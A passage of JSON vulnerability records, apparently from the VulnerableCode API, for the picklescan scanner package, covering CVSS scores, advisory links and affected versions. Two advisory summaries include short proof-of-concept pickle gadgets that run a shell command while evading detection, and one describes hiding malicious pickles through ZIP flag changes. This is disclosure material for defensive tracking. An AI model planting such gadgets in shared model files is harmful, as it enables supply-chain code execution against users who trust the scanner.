"VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.28" } ], "aliases": [ "GHSA-f745-w6jp-hpxx" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-dsy5-2z6e-jqds" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212461?format=api", "vulnerability_id": "VCID-e95k-rym7-a7bk", "summary": "Picklescan is vulnerable to RCE through missing detection when calling numpy.f2py.crackfortran._eval_length", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33" }, { "reference_url": "https://github.com/advisories/GHSA-6556-fwc2-fg2p", "reference_id": "GHSA-6556-fwc2-fg2p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6556-fwc2-fg2p" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-6556-fwc2-fg2p", "reference_id": "GHSA-6556-fwc2-fg2p", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-6556-fwc2-fg2p" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-6556-fwc2-fg2p" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-e95k-rym7-a7bk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360720?format=api", "vulnerability_id": "VCID-eub2-wr7z-c3e6", "summary": "Duplicate Advisory: Zip Flag Bit Exploit Crashes Picklescan But Not PyTorch\n## Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-w8jq-xcqf-f792. This link is maintained to preserve external references.\n\n## Original Description\npicklescan before 0.0.23 fails to detect malicious pickle files inside PyTorch model archives when certain ZIP file flag bits are modified. By flipping specific bits in the ZIP file headers, an attacker can embed malicious pickle files that remain undetected by PickleScan while still being successfully loaded by PyTorch's torch.load(). This can lead to arbitrary code execution when loading a compromised model.", "references": [ { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1945", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1945" }, { "reference_url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1945", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://sites.google.com/sonatype.com/vulnerabilities/cve-2025-1945" }, { "reference_url": "https://github.com/advisories/GHSA-2fh4-gpch-vqv4", "reference_id": "GHSA-2fh4-gpch-vqv4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2fh4-gpch-vqv4" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-w8jq-xcqf-f792", "reference_id": "GHSA-w8jq-xcqf-f792", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-w8jq-xcqf-f792" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/87037?format=api", "purl": "pkg:pypi/picklescan@0.0.23", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cce-4mst-r7h4" }, { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8bj4-tmz9-gyau" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-d4vv-a8kx-5kdc" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-rqap-hdeb-1ffb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhdd-ck3x-pbh7" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.23" } ], "aliases": [ "GHSA-2fh4-gpch-vqv4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-eub2-wr7z-c3e6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360674?format=api", "vulnerability_id": "VCID-fbng-xtyv-zqdf", "summary": "Picklescan has a missing detection when calling built-in python trace.Trace.runctx\n### Summary\n\nUsing trace.Trace.runctx, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to trace.Trace.runctx function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass EvilTraceRunctx:\n def __reduce__(self):\n from trace import Trace\n payload = \"__import__('os').system('whoami')\"\n return Trace.runctx, (Trace(), payload, {}, {})\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-g344-hcph-8vgg", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-g344-hcph-8vgg" }, { "reference_url": "https://github.com/advisories/GHSA-g344-hcph-8vgg", "reference_id": "GHSA-g344-hcph-8vgg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-g344-hcph-8vgg" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-g344-hcph-8vgg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fbng-xtyv-zqdf" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212548?format=api", "vulnerability_id": "VCID-fkcx-bkmd-4bbe", "summary": "picklescan vulnerable to arbitrary file create using logging.FileHandler", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/4d9bc9cd34bca8672dad3481cd4556d5ba747156", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/4d9bc9cd34bca8672dad3481cd4556d5ba747156" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/60", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/60" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v1.0.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v1.0.1" }, { "reference_url": "https://github.com/advisories/GHSA-m7j5-r2p5-c39r", "reference_id": "GHSA-m7j5-r2p5-c39r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m7j5-r2p5-c39r" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m7j5-r2p5-c39r", "reference_id": "GHSA-m7j5-r2p5-c39r", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.5", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-m7j5-r2p5-c39r" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38505?format=api", "purl": "pkg:pypi/picklescan@1.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@1.0.1" } ], "aliases": [ "GHSA-m7j5-r2p5-c39r" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fkcx-bkmd-4bbe" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360654?format=api", "vulnerability_id": "VCID-fsjg-pn1f-fqd6", "summary": "Picklescan has a missing detection when calling built-in python idlelib.debugobj.ObjectTreeItem\n### Summary\n\nUsing idlelib.debugobj.ObjectTreeItem.SetText, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to idlelib.debugobj.ObjectTreeItem.SetText function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass EvilDebugobjSetText:\n def __reduce__(self):\n from idlelib.debugobj import ObjectTreeItem\n # ObjectTreeItem(..., setfunction=print).SetText(cmd)\n return ObjectTreeItem(\"label\", None, print).SetText, (\"__import__('os').system('whoami')\",)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-3vg9-h568-4w9m", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-3vg9-h568-4w9m" }, { "reference_url": "https://github.com/advisories/GHSA-3vg9-h568-4w9m", "reference_id": "GHSA-3vg9-h568-4w9m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3vg9-h568-4w9m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-3vg9-h568-4w9m" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fsjg-pn1f-fqd6" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212458?format=api", "vulnerability_id": "VCID-fvhz-kyju-qkg5", "summary": "Picklescan is vulnerable to RCE via missing detection when calling numpy.f2py.crackfortran.param_eval", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33" }, { "reference_url": "https://github.com/advisories/GHSA-cffc-mxrf-mhh4", "reference_id": "GHSA-cffc-mxrf-mhh4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cffc-mxrf-mhh4" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-cffc-mxrf-mhh4", "reference_id": "GHSA-cffc-mxrf-mhh4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-cffc-mxrf-mhh4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/36380?format=api", "purl": "pkg:pypi/picklescan@0.0.33", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.33" } ], "aliases": [ "GHSA-cffc-mxrf-mhh4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-fvhz-kyju-qkg5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212455?format=api", "vulnerability_id": "VCID-fxc2-cr37-fuhg", "summary": "Picklescan missing detection when calling numpy.f2py.crackfortran.getlincoef", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/70c1c6c31beb6baaf52c8db1b6c3c0e84a6f9dab" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/53", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/53" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.33", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", 